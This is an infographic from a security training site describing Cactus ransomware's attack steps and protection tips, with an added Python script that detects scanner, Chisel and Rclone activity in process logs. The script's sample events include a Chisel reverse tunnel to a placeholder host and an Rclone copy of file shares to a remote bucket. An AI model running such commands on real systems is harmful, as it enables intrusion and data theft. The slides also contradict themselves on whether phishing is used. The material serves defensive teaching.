Title: HACKER’S HEIST CACTUS RANSOMWARE
learntorise
www.infosectrain.com
WHAT IS CACTUS RANSOMWARE
Cactus Ransomware sets itself apart with its
distinctive encryption methods, making it
difficult to detect by security tools. It
exploits VPN vulnerabilities to infiltrate
networks instead of relying on phishing emails,
and it possesses the uncommon ability to
self-encrypt, enhancing its chances of
remaining undetected on compromised systems.
CACTUS RANSOMWARE Attack Tactics, Techniques, Procedures
STEP 1 The attacker gets into the victim's
network by taking advantage of known
vulnerabilities in VPN appliances that
haven't been fixed or updated.
STEP 2 The attacker conducts an internal network scan
using tools like SoftPerfect Network Scanner or
PSnmap to create a map of the environment.
STEP 3 The attacker installs the
Cactus ransomware on the victim's system. This
can be done through various methods, such as
phishing emails, malicious attachments, or
drive-by downloads.
STEP 4 The attacker installs Remote Monitoring and
Management (RMM) tools on compromised systems,
enabling remote access and file pushing
capabilities.
STEP 5 To facilitate lateral movement, the
attacker deploys the Cobalt Strike
post-exploitation framework and Chisel proxying
tool.
STEP 6 The attacker executes a script to disable widely
used anti-virus tools to decrease the chances of
their tools being detected and blocked.
STEP 7 The attacker employs the Rclone tool to
conduct data theft from the environment,
automating the process for data exfiltration.
STEP 8 The attacker utilizes a PowerShell script to
distribute ransomware across all systems within
the environment.
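
As an added example (not part of the original slides), the Python below correlates process-creation events per host against the tool-related steps above (2, 5 and 7) and alerts only when several stages appear on one host within a time window. The name patterns, the `timestamp|host|command line` log format and the sample events are constructed assumptions; binaries can be renamed, so a match is a lead to investigate, not proof.

```python
import re
from datetime import datetime, timedelta

# Assumed name patterns for tools named in the steps (illustrative, not from
# the slides). Renamed binaries will evade them; tune per environment.
STAGE_PATTERNS = {
    "step2_network_scan": re.compile(r"\bnetscan(64)?\.exe\b|\bInvoke-PSnmap\b", re.I),
    "step5_proxy_tunnel": re.compile(r"\bchisel(\.exe)?\b", re.I),
    "step7_exfiltration": re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync)\b", re.I),
}

# Constructed sample process-creation events: timestamp|host|command line
SAMPLE_EVENTS = r"""
2024-01-10T09:00:12|FS01|C:\Windows\System32\svchost.exe -k netsvcs
2024-01-10T09:14:40|FS01|C:\Users\Public\netscan.exe
2024-01-10T09:40:03|FS01|C:\Users\Public\chisel.exe client tunnel.example.invalid:443 R:socks
2024-01-10T11:05:27|FS01|C:\ProgramData\rclone.exe copy D:\Shares remote:bucket
2024-01-10T12:00:00|WS07|C:\Tools\rclone.exe sync C:\Backups nas:backups
2024-01-10T10:00:00|WS09|powershell.exe -Command Invoke-PSnmap
2024-01-13T10:00:00|WS09|C:\Tools\rclone.exe copy C:\Data remote:archive
"""

def parse_events(text):
    """Return (time, host, command line) tuples sorted by time."""
    events = []
    for line in text.splitlines():
        if line.count("|") < 2:
            continue  # skip blank or malformed lines
        ts, host, cmd = line.split("|", 2)  # command line may itself contain '|'
        events.append((datetime.fromisoformat(ts), host, cmd))
    return sorted(events)

def classify(cmd):
    """Return the stages whose pattern matches this command line."""
    return [stage for stage, rx in STAGE_PATTERNS.items() if rx.search(cmd)]

def correlate(events, window=timedelta(hours=24), min_stages=2):
    """Alert on hosts showing >= min_stages distinct stages inside one window."""
    hits = {}  # host -> [(time, stage)]
    for ts, host, cmd in events:
        for stage in classify(cmd):
            hits.setdefault(host, []).append((ts, stage))
    alerts = {}
    for host, seen in hits.items():
        for start, _ in seen:
            stages = {s for t, s in seen if start <= t <= start + window}
            if len(stages) >= min_stages and len(stages) > len(alerts.get(host, [])):
                alerts[host] = sorted(stages)
    return alerts
```

On the sample data only FS01 alerts: WS07 shows a lone Rclone run, and the two WS09 events are three days apart, outside the default 24-hour window.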
TIPS TO PROTECT YOURSELF FROM CACTUS RANSOMWARE
- Keeping VPN appliances up to date with the latest security patches.
- Using network monitoring tools to detect suspicious activity.
- Educating yourself about ransomware attacks.
- Implementing strong password policies and enforcing multi-factor authentication.